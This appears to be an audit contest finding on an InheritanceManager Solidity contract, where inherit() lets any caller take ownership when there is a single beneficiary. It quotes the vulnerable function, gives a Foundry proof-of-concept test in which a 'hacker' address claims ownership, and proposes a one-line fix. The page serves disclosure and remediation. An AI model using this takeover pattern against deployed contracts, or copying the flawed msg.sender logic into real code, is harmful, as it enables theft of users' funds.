Submission Details
Severity:
Hacker can become owner by using inherit function, and can steal money
Hacker can become owner by using inherit function, and can steal money
Description: The function InheritanceManager::inherit can be call by anyone and when there is just one beneficiary the msg.sender become the owner.
function inherit() external {
if (block.timestamp < getDeadline()) {
revert InactivityPeriodNotLongEnough();
}
if (beneficiaries.length == 1) {
owner = msg.sender;
_setDeadline();
} else if (beneficiaries.length > 1) {
isInherited = true;
} else {
revert InvalidBeneficiaries();
}
}
Impact: Hacker can just call the function inherit when there is just one beneficiary and steal the fund.
Proof of Concept:
Add this test in InheritanceManagerTest.t.sol
function testHackerCanBeOwner() public {
address hacker = makeAddr("hacker");
// one beneficiary
vm.prank(owner);
im.addBeneficiery(user1);
vm.stopPrank();
vm.warp(1 + 90 days);
// hacker call the inherit function
vm.startPrank(hacker);
im.inherit();
vm.stopPrank();
// he/she is the owner now
console.log("The owner of the contract:", hacker);
assertEq(im.getOwner(), hacker);
}
Recommended Mitigation: Change the following line in InheritanceManager::inherit
function inherit() external {
if (block.timestamp < getDeadline()) {
revert InactivityPeriodNotLongEnough();
}
if (beneficiaries.length == 1) {
- owner = msg.sender;
+ owner = beneficiaries[0];
_setDeadline();
} else if (beneficiaries.length > 1) {
isInherited = true;
} else {
revert InvalidBeneficiaries();
}
}
\
Updates
Lead Judging Commences
0xtimefliez 6 months ago
Submission Judgement Published Assigned finding tags:
Inherit depends on msg.sender so anyone can claim the contract
Rewards breakdown
nSLOC
211This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.